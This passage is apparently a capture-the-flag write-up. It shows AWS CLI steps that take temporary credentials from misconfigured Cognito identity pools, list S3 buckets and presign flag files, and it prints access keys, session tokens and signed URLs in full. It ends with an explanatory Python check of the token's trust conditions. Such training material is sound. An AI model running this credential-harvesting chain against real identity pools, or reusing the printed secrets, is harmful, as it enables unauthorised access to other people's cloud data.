"Token": "eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWUzZC1jZWJjLWYxNGEtMTk5MjZiY2M3ZGI1IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MDkyMzUyMDcsImlhdCI6MTcwOTIzNDYwN30.tHRbOpmu5tkXLBxDk-w1l-o3J__NcCtNrwtJIPKsYtsi0H3j5EzVEsALlV-LFbua7WbfqEQCcupH2YROYbPO0-Ik9qfMV6f7DqyU4aS3OUTL7GaiPZHbDlJoimTsmpiOuWFiIuEw0uIsvWStM1E18kEkvvn5q6pTogsg8wUzNLdUjQDe6g9qiEjc6f-SQqfp4flZjIBTzqpjrhGAnECeZKrxaZHWHcxX_sAYeo2kg9ZPCXn1_Pvu7sOjhMQ88uE6t5be6K22kZfituHYbfNm0l2wnhnw5SD6gCGDDuHv-D3rr-gV2Dg-REr5vW5f7YEIygf4V3fxpue_-6sAZiLbFA"
}

The most useful call is get-credentials-for-identity, which returns credentials directly

> aws cognito-identity get-credentials-for-identity --identity-id us-east-1:157d6171-ee3d-cebc-f14a-19926bcc7db5

{
"IdentityId": "us-east-1:157d6171-ee3d-cebc-f14a-19926bcc7db5",
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXD2L5VLQ5",
"SecretKey": "4WxoP7V/KJi/qz7QXC0mYVQRyD4vv9Ae6ge/BEiD",
"SessionToken": "...",
"Expiration": 1709238403.0
}
}

With the credentials we can access the bucket directly

> aws configure set aws_access_key_id xxx --profile wiz
> aws configure set aws_secret_access_key xxx --profile wiz
> aws configure set aws_session_token xxx --profile wiz
> aws s3api list-objects --bucket wiz-privatefiles --profile wiz

{
"Contents": [
{
"Key": "cognito1.png",
"LastModified": "2023-06-05T19:42:27+00:00",
"ETag": "\"539693e3b6f41aa7545e9f8965c3cadd\"",
"Size": 4220,
"StorageClass": "STANDARD",
"Owner": {
"DisplayName": "shir+ctf",
"ID": "37ec5af87b339325fbafa92e65fbd5f5ab4bcd7e733fa76838720554da48d3f9"
}
},
{
"Key": "flag1.txt",
"LastModified": "2023-06-05T13:28:35+00:00",
"ETag": "\"20fcd58d8bdd4d81814b501230a94727\"",
"Size": 37,
"StorageClass": "STANDARD",
"Owner": {
"DisplayName": "shir+ctf",
"ID": "37ec5af87b339325fbafa92e65fbd5f5ab4bcd7e733fa76838720554da48d3f9"
}
}
],
"RequestCharged": null
}

Then get the object URL; we can generate a presigned URL for it

> aws s3 presign s3://wiz-privatefiles/flag1.txt --expires-in 3600 --profile wiz

https://wiz-privatefiles.s3.amazonaws.com/flag1.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIARK7LBOHXC5OGAMXN%2F20240229%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240229T200016Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjECQaCXVzLWVhc3QtMSJIMEYCIQCreeDqdCLRCcfyVNOq1CvG9MGhYGh2gg0KCYXwqIsmTQIhAOpt8RWhK4cF2qkcddSqTjjoy7xtES2YIqmgtq2xkOcZKsgFCB0QABoMMDkyMjk3ODUxMzc0IgwVRgMrNLSKcA6WlzUqpQXee%2B8shf0SXztS2bMD%2FCt0YUf3WsEHlIcTwANRm%2Fvyjn%2FgdrtI44jm3%2Bwm6wi2%2BOmqucy3kkHAafqx%2Fa314DNSxVlvYJUCPIXnVFddlFXxihuF5uR33dh3SoCHjysIEcvHLrVKz0DODvWb2qOpS7X7qav0%2F5rP6%2BsMIGzOtQzNMpLh4uaJAESVcLRtL0X3lfj11wG95cu7YWuAr6hSA%2FFX8YcKiZM8NRnGihhQ7NA0n7Xt0484fEOWPx6NB7Ud8zBhdOS5bKUO2M5gVvLVVG%2F5ZsZOjYQIUp7I%2FoaTLzoIdcmKIUPHnpnrcqwR3dyI%2FMJOdCqLfHn5sLSGQNV8525B6W4GOGDOwoCSEnqluBcsdYS%2Fy1K%2FoojMAo9MUtyTzvexRvXkwRof5HEPXP75VnmTscZHz6maAKqr8JLYlTMA49nfK6txwjgBS8am3bnUrrmaBTUGZsrMFV6EYhUOjlFvpBkYfeS1aphlE7cL00uJUiCaNpeuodt6nPek%2BzLwDC3d4CpFhdZydUL7HiLUxdc4YjFiIqrv3bVpaG3sLM%2B6B04qw8e5mqOMIkM5G7Ka6IqBjDiSGB8PVj51120PJKFZCKqfBXWaFASV7m90dOUX%2Bx0FkZ5LUq2ASu8PQfREt8rmeqoxQA12yMpwOxoDewVsaiQHEek%2B%2FNeuncoCz0Wkag8PupbmqFHLA4QiLQGErZJIMoB6meNbkHx5Ywclr%2FUInf1nAtgxQ%2BdFf1u2c6j9taDL59Ce39lcRvaMepSaJDJ4r0cp9NLmxm2mszJ0mf2oCdvjjMEiGO49UTziVecXgEZuvc58kQNtGBrccNqKb65PvpIlTX%2BLNFQccC3w3%2F8rtGhvm6FzF1TpIROqycBvomMrRR6SjDXO6KDE6M27iF36yog6DjDsv4OvBjrdAh5UHsBXUld7Q%2F4VNfOQyJEkulNbWx0V9AU4KXBKc6n57ErV55jLKHoj181DdskSag2s2CnZI2D%2BNG9CGxVvQTmII4admiH03N0EA7Vj697HWHnyYLguRWexhL3%2FBWS3rL9DuESZz8%2FEaDnGMK9niThrA7TPCUqszGGLnCRRrzjvbAijW72STHWKMnQuujfyKg70ZPwmm9YhOoHZGv1WcHS9MG7DfhylAKvvwaabk7ND%2BgF6NqDakqzewM8aeWExjX9SZsXe6CvOb%2F0X52XO3k6kUWetqGmvnyn0Fjv1oQ6vLR9q4G7%2F5UbX%2Be1LSs4FzpJt8oFcGsyZrfLPPeKnNotXJMfVfyoRcvU%2BI3RI5dYUSfzdjBE0jptm5o2vzZnw9GIuIlF4%2Bg9ML7KPZ7BMEJ65W8aFksGZybu2Xw5uEDk23VtJgj%2BedyWzzuiKw745pnPekafrH8706xR4r7M%3D&X-Amz-Signature=eebf31960b30ae0b129ecadd1cee1d58d29636e25f236d1d79667270cd94f9b2

One final push

Anonymous access no more. Let’s see what can you do now.

Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role

The last challenge; the policy is as follows

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}

A Federated entry appears in the Principal of this challenge; let's look at the documentation's explanation

Web identity session principals

A web identity session principal is a session principal that results from using the AWS STS AssumeRoleWithWebIdentity operation. You can use an external web identity provider (IdP) to sign in, and then assume an IAM role using this operation. This leverages identity federation and issues a role session. For more information about which principals can assume a role using this operation, see Comparing the AWS STS API operations.

When you issue a role from a web identity provider, you get this special type of session principal, which includes information about the web identity provider.

Use this principal type in your policy to allow or deny access based on the trusted web identity provider. To specify the web identity role session ARN in the Principal element of a role trust policy, use the following format:

"Principal": { "Federated": "cognito-identity.amazonaws.com" }
"Principal": { "Federated": "www.amazon.com" }
"Principal": { "Federated": "graph.facebook.com" }
"Principal": { "Federated": "accounts.google.com" }

So the principal of this policy is a web identity session principal authenticated through cognito-identity, and it is allowed to perform sts:AssumeRoleWithWebIdentity. Let's look at that operation in the documentation.

https://docs.aws.amazon.com/zh_cn/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html

This page is in English; an excerpt:

Returns a set of temporary security credentials for users who have been authenticated in a mobile or web application with a web identity provider. Example providers include the OAuth 2.0 providers Login with Amazon and Facebook, or any OpenID Connect-compatible identity provider such as Google or Amazon Cognito federated identities.

After you have an OpenID Connect token, you can exchange it for temporary AWS credentials through the AssumeRoleWithWebIdentity API call in AWS Security Token Service (STS).

In other words, as long as we have been authenticated by cognito-identity, we can call AssumeRoleWithWebIdentity to exchange our token for credentials. This policy configures the role's trust and permissions; see the documentation

https://docs.aws.amazon.com/zh_cn/cognito/latest/developerguide/role-trust-and-permissions.html

https://docs.aws.amazon.com/zh_cn/cognito/latest/developerguide/iam-roles.html

The token presented to AWS STS is generated by the identity pool, which converts a user pool, social or OIDC provider token, or SAML assertion into its own token. The identity pool token contains an aud claim, which is the identity pool ID.

The following example role trust policy allows the federated service principal cognito-identity.amazonaws.com to call the AWS STS API AssumeRoleWithWebIdentity. The request succeeds only if the identity pool token in the API request has the following claims.

There is also a restriction on cognito-identity.amazonaws.com:aud, which here pins the identity pool ID.

First use get-id to obtain an identity ID

> aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b

{
"IdentityId": "us-east-1:157d6171-eea3-c802-0b38-5f5c44f832ac"
}

get-open-id-token returns an OpenID token, and this time it is useful

> aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-eea3-c802-0b38-5f5c44f832ac

{
"IdentityId": "us-east-1:157d6171-eea3-c802-0b38-5f5c44f832ac",
"Token": "eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVhMy1jODAyLTBiMzgtNWY1YzQ0ZjgzMmFjIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MDkyMzk0NzEsImlhdCI6MTcwOTIzODg3MX0.UDEyn3rMBFHJUL5tRANeUucbOcWFVdmpqHT7EZDVsGCJ-_lSO9aU2MYEYxdrDFE0sfQY6kEFlXdfYrNKE-dcsU06FVD0nF3A5zebtA78TQh4FvPGNCgDiy3gOCGlHgoQNOoRwIJpLcWPfBKS_fEsC_vh6fDAwBtK1ngsyr4RlwhmA_kQ_ysw-sl1Pg0hzeEWbWWBLPIV7zPcTrcPCdJjBZmmQZdUv2Ft3EzfXFJJtuh7rC9niJdMS6Sg-Lz9hRn_mjWUTLqqLTEmwyELBxc-urUXjfVvcIexCYL_X4kArRvDMd-22oLUGiwiNnkSTomlKzhiht3nx9gd2j6rM5Fp-w"
}

Use it to call AssumeRoleWithWebIdentity

> aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role  --role-session-name A.R. --web-identity-token eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVhMy1jODAyLTBiMzgtNWY1YzQ0ZjgzMmFjIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MDkyMzk0NzEsImlhdCI6MTcwOTIzODg3MX0.UDEyn3rMBFHJUL5tRANeUucbOcWFVdmpqHT7EZDVsGCJ-_lSO9aU2MYEYxdrDFE0sfQY6kEFlXdfYrNKE-dcsU06FVD0nF3A5zebtA78TQh4FvPGNCgDiy3gOCGlHgoQNOoRwIJpLcWPfBKS_fEsC_vh6fDAwBtK1ngsyr4RlwhmA_kQ_ysw-sl1Pg0hzeEWbWWBLPIV7zPcTrcPCdJjBZmmQZdUv2Ft3EzfXFJJtuh7rC9niJdMS6Sg-Lz9hRn_mjWUTLqqLTEmwyELBxc-urUXjfVvcIexCYL_X4kArRvDMd-22oLUGiwiNnkSTomlKzhiht3nx9gd2j6rM5Fp-w

{
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXLXX4MU5G",
"SecretAccessKey": "6STeVlIbcNKf+1HXbCXX3XTuLH/nEoh/rBw02qxp",
"SessionToken": "IQoJb3JpZ2luX2VjECUaCXVzLWVhc3QtMSJHMEUCIBKY5MN7n5EgZqjOQjee98l6Qnu+QR9AceJZtivuPzZ+AiEAoz92y/gWW3iBKTma3Zi264ZSDW/tKokG28kpav8V77kqhQMIHhAAGgwwOTIyOTc4NTEzNzQiDOL+gEWh/lK1PIjXViriAjDkoYmr6iy0lf9lvXr07llzPt0dSlkc9MpBxeRqhEwapZjUpSC+HVPncYxC90OTdLUPDLod82wfwmPlG7fCrjaN8nitC+fX9tF7SvR6O6FgfU6ZDuS7Uf2sIkhm+Yxir6qCPxF/M1VAQPoGJJO0uwS2iV28wG/B2Mhol0t0q8uQQUNccs+jHFB/6KY9MqAZQ9veMSCQRZ4tPJmLDd2NxyEO3kpOx2QG00fWEjVqjN55ti13YEio+YwQCCSvX6+oC4rEuxL1T/1E5MK3YzYQRavTfb4T9P5fwxDqYpzMgOYYrAFYbNwaUGmuJuN/K33wxc0kWncm6qOOOCs2h/koi/dPfw25Ap0G07t6gAnqdtQFDOPLnmh5pwbUW/TFZ/RGLyWp8aMczQAl6fI0bjL789jVaWxdRrcCNuNkqQukCuX6Zqb1RGUw76ctMthzYUywGmbFVmS+uZUQ916K6GEIHRDa/jDU1oOvBjqHAjJQDQ7tGIInLh30Z+1TXHK0Dj/PPYJOT2fqUjz6rpiykoLaPshH7O9us01E33fj8bxgtBtNEahBHUb9RznKmdzU3v/6QvvnWMwinBtnHubl0Nu9JdU2lUMzt+BeN0Db1P1bzGxmEXfUvmyZZZG00DaGFuEi5Z9bYGBSJZgErVGx4xCgItKOjJCHlF3dTrFOaTjnUxNlbEljMcqif99u0l0kPIMHBWVvdgRFh3OXjrCG4ta5EjMv3pyqizmmtItCPeojMsOf5vr2jxpIivCHlJJVwsgPwMkWWW4wAQ+4d4VzDrPsbmSYUleoXbtcxoBnmW2LNjqf5N7owAPRbLV0BgMen/VJQU3T",
"Expiration": "2024-02-29T21:38:44+00:00"
},
"SubjectFromWebIdentityToken": "us-east-1:157d6171-eea3-c802-0b38-5f5c44f832ac",
"AssumedRoleUser": {
"AssumedRoleId": "AROARK7LBOHXASFTNOIZG:A.R.",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/A.R."
},
"Provider": "cognito-identity.amazonaws.com",
"Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}

Load the credentials into the CLI and check who we are

> aws sts get-caller-identity

{
"UserId": "AROARK7LBOHXASFTNOIZG:A.R.",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/A.R."
}

Look at the buckets

> aws s3 ls

2023-06-05 01:07:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 21:07:44 thebigiamchallenge-admin-storage-abf1321
2023-06-05 00:31:02 thebigiamchallenge-storage-9979f4b
2023-06-05 21:28:31 wiz-privatefiles
2023-06-05 21:28:31 wiz-privatefiles-x1000

List the bucket

> aws s3 ls wiz-privatefiles-x1000
2023-06-06 03:42:27 4220 cognito2.png
2023-06-05 21:28:35 40 flag2.txt

Get the URL

> aws s3 presign wiz-privatefiles-x1000/flag2.txt
https://wiz-privatefiles-x1000.s3.us-east-1.amazonaws.com/flag2.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIARK7LBOHXLXX4MU5G%2F20240229%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240229T204708Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjECUaCXVzLWVhc3QtMSJHMEUCIBKY5MN7n5EgZqjOQjee98l6Qnu%2BQR9AceJZtivuPzZ%2BAiEAoz92y%2FgWW3iBKTma3Zi264ZSDW%2FtKokG28kpav8V77kqhQMIHhAAGgwwOTIyOTc4NTEzNzQiDOL%2BgEWh%2FlK1PIjXViriAjDkoYmr6iy0lf9lvXr07llzPt0dSlkc9MpBxeRqhEwapZjUpSC%2BHVPncYxC90OTdLUPDLod82wfwmPlG7fCrjaN8nitC%2BfX9tF7SvR6O6FgfU6ZDuS7Uf2sIkhm%2BYxir6qCPxF%2FM1VAQPoGJJO0uwS2iV28wG%2FB2Mhol0t0q8uQQUNccs%2BjHFB%2F6KY9MqAZQ9veMSCQRZ4tPJmLDd2NxyEO3kpOx2QG00fWEjVqjN55ti13YEio%2BYwQCCSvX6%2BoC4rEuxL1T%2F1E5MK3YzYQRavTfb4T9P5fwxDqYpzMgOYYrAFYbNwaUGmuJuN%2FK33wxc0kWncm6qOOOCs2h%2Fkoi%2FdPfw25Ap0G07t6gAnqdtQFDOPLnmh5pwbUW%2FTFZ%2FRGLyWp8aMczQAl6fI0bjL789jVaWxdRrcCNuNkqQukCuX6Zqb1RGUw76ctMthzYUywGmbFVmS%2BuZUQ916K6GEIHRDa%2FjDU1oOvBjqHAjJQDQ7tGIInLh30Z%2B1TXHK0Dj%2FPPYJOT2fqUjz6rpiykoLaPshH7O9us01E33fj8bxgtBtNEahBHUb9RznKmdzU3v%2F6QvvnWMwinBtnHubl0Nu9JdU2lUMzt%2BBeN0Db1P1bzGxmEXfUvmyZZZG00DaGFuEi5Z9bYGBSJZgErVGx4xCgItKOjJCHlF3dTrFOaTjnUxNlbEljMcqif99u0l0kPIMHBWVvdgRFh3OXjrCG4ta5EjMv3pyqizmmtItCPeojMsOf5vr2jxpIivCHlJJVwsgPwMkWWW4wAQ%2B4d4VzDrPsbmSYUleoXbtcxoBnmW2LNjqf5N7owAPRbLV0BgMen%2FVJQU3T&X-Amz-Signature=23eca23e936936807ae7ae2774abcb0a5670a5a2c8fe58005a1477a0db9a8878
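The reason the last two challenges work is visible in the token itself: the identity pool stamps the aud claim on every token it issues, including ones for unauthenticated (guest) identities, and the trust policy above pins only aud. The following added Python (not code from the challenge or from AWS) decodes the claims of a token with the same layout as the get-open-id-token output and compares the page's aud-only trust condition with the variant AWS uses for an authenticated role, which additionally requires "authenticated" in the amr claim. The token is constructed here with a placeholder signature, so nothing in it is verified; the kid, typ and alg header values are copied from the page's token header.

```python
import base64
import json
from typing import Dict

# Identity pool ID pinned by the page's role trust policy (cognito-identity.amazonaws.com:aud).
POOL_ID = "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
ISSUER = "https://cognito-identity.amazonaws.com"


def _b64url_decode(segment: str) -> bytes:
    # JWT segments omit '=' padding; restore it so the standard decoder accepts them.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def make_token(claims: Dict) -> str:
    """Build a token shaped like the one get-open-id-token returns (constructed, unsigned)."""
    header = {"kid": "us-east-115", "typ": "JWS", "alg": "RS512"}
    return ".".join([
        _b64url_encode(json.dumps(header, separators=(",", ":")).encode()),
        _b64url_encode(json.dumps(claims, separators=(",", ":")).encode()),
        "PLACEHOLDER-SIGNATURE",  # not a real signature; nothing here verifies it
    ])


def decode_claims(token: str) -> Dict:
    """Return the payload claims of a compact JWS without verifying it (inspection only)."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))


def trust_policy_allows(claims: Dict, now: int, require_authenticated: bool) -> bool:
    """Model the trust policy's conditions.

    The page's policy checks only cognito-identity.amazonaws.com:aud, and the identity
    pool puts that claim on every token it issues, guest (unauthenticated) identities
    included. The hardened variant (require_authenticated=True) also requires the amr
    claim to contain "authenticated", i.e. the extra clause in the trust policy of a
    Cognito authenticated role:
        "ForAnyValue:StringLike": {"cognito-identity.amazonaws.com:amr": "authenticated"}
    """
    if claims.get("iss") != ISSUER or claims.get("aud") != POOL_ID:
        return False
    if claims.get("exp", 0) <= now:
        return False  # STS rejects expired tokens
    if require_authenticated and "authenticated" not in claims.get("amr", []):
        return False
    return True


# Constructed claims with the same layout as the page's tokens (sub/aud/amr/iss/exp/iat).
NOW = 1709238900
GUEST_CLAIMS = {"sub": "us-east-1:00000000-0000-0000-0000-000000000000",  # placeholder identity
                "aud": POOL_ID, "amr": ["unauthenticated"], "iss": ISSUER,
                "exp": NOW + 600, "iat": NOW}
AUTH_CLAIMS = dict(GUEST_CLAIMS, amr=["authenticated"])
OTHER_POOL_CLAIMS = dict(GUEST_CLAIMS, aud="us-east-1:ffffffff-ffff-ffff-ffff-ffffffffffff")


def summarize(token: str, now: int = NOW) -> Dict[str, object]:
    """Decode a token and report what each variant of the trust policy would decide."""
    claims = decode_claims(token)
    return {
        "amr": claims.get("amr", []),
        "aud_only_policy": trust_policy_allows(claims, now, require_authenticated=False),
        "aud_plus_amr_policy": trust_policy_allows(claims, now, require_authenticated=True),
    }


if __name__ == "__main__":
    for label, claims in [("guest", GUEST_CLAIMS), ("authenticated", AUTH_CLAIMS),
                          ("other pool", OTHER_POOL_CLAIMS)]:
        print(label, summarize(make_token(claims)))
```

Running decode_claims on the page's real token shows the same shape, with amr equal to ["unauthenticated"], which is exactly what the aud-only trust policy fails to distinguish.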
